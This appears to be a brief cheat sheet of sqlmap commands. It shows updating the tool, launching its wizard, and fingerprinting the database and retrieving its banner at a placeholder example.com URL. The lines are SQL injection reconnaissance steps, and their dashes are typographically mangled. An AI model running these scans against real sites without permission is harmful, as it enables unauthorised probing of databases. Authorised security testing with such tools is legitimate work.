- python sqlmap.py –update
- python sqlmap.py –wizard
- python sqlmap.py -u “http://www.example.com/?id=377” -f (-f, –fingerprint Perform an extensive DBMS version fingerprint. -u URL, –url=URL Target url)
- python sqlmap.py -u “http://www.example.com/?id=377” -b (-b, –banner Retrieve DBMS banner)
- python sqlmap.py -u “http://www.example.com/?id=377” -b –dbms mysql